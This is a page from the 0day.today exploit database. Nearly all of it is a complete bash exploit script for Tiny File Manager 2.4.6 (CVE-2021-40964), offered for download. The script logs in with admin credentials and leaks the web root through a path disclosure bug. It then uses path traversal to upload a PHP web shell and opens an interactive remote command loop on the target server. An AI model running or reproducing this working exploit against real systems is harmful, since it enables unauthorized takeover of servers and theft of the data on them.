0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Tiny File Manager 2.4.6 - Remote Code Execution Exploit
Author
Risk
![](/img/risk/critlow_4.gif)
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: Tiny File Manager 2.4.6 - Remote Code Execution (RCE) # Exploit Author: FEBIN MON SAJI # Software Link: https://github.com/prasathmani/tinyfilemanager # Version: Tiny File Manager <= 2.4.6 # Tested on: Ubuntu 20.04 # CVE : CVE-2021-40964 # Reference: https://febin0x4e4a.wordpress.com/2022/01/23/tiny-file-manager-authenticated-rce/ #!/bin/bash check(){ which curl if [ $? = 0 ] then printf "[✔] Curl found! \n" else printf "[❌] Curl not found! \n" exit fi which jq if [ $? = 0 ] then printf "[✔] jq found! \n" else printf "[❌] jq not found! \n" exit fi } usage(){ printf " TIny File Manager Authenticated RCE Exploit. By FEBIN $0 <URL> <Admin Username> <Password> Example: $0 http://files.ubuntu.local/index.php admin \"admin@123\" " } log-in(){ URL=$1 admin=$2 pass=$3 cookie=$(curl "$URL" -X POST -s -d "fm_usr=$admin&fm_pwd=$pass" -i | grep "Set-Cookie: " | sed s/"Set-Cookie: "//g | tr -d " " | tr ";" "\n" | head -1) if [ $cookie ] then printf "\n[+] Login Success! Cookie: $cookie \n" else printf "\n[-] Logn Failed! \n" fi URL=${URL} } find_webroot(){ webroot=$(curl -X POST "$URL?p=&upload" -d "type=upload&uploadurl=http://vyvyuytcuytcuycuytuy/&ajax=true" -H "Cookie: $cookie" -s | jq | grep file | tr -d '"' | tr -d "," | tr -d " " | sed s/"file:"//g | tr "/" "\n" | head --lines=-1 | tr "\n" "/" ) if [ $webroot ] then printf "\n[*] Try to Leak Web root directory path \n\n" printf "[+] Found WEBROOT directory for tinyfilemanager using full path disclosure bug : $webroot \n\n" else printf "[-] Can't find WEBROOT! Using default /var/www/html \n" webroot="/var/www/html" fi } upload(){ #webroot="/var/www/tiny/" shell="shell$RANDOM.php" echo "<?php system(\$_REQUEST['cmd']); ?>" > /tmp/$shell curl $URL?p= -X POST -s -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" -b $cookie -F "p=" -F "fullpath=../../../../../../../..${webroot}/${shell}" -F "file=@/tmp/$shell" | grep "successful" } exploit(){ WEB_URL=$(printf "$URL" | tr "/" "\n" | head --lines=-1 | tr "\n" "/") upload if [ $? = 0 ] then printf "[+] File Upload Successful! \n" else printf "[-] File Upload Unsuccessful! Exiting! \n" exit 1 fi printf "[+] Checking for the shell \n" curl ${WEB_URL}/${shell}?cmd=echo%20found -s | head -1 | grep "found" >/dev/null if [ $? = 0 ] then printf "[+] Shell found ${WEB_URL}/$shell \n" else printf "[-] Shell not Found! It might be uploaded somewhere else in the server or got deleted. Exiting! \n" exit 2 fi printf "[+] Getting shell access! \n\n" while true do printf "$> " read cmd curl ${WEB_URL}/$shell -s -X POST -d "cmd=${cmd}" done } if [ $1 ] && [ $2 ] && [ $3 ] then check log-in $1 $2 $3 find_webroot exploit else usage fi # 0day.today [2024-07-02] #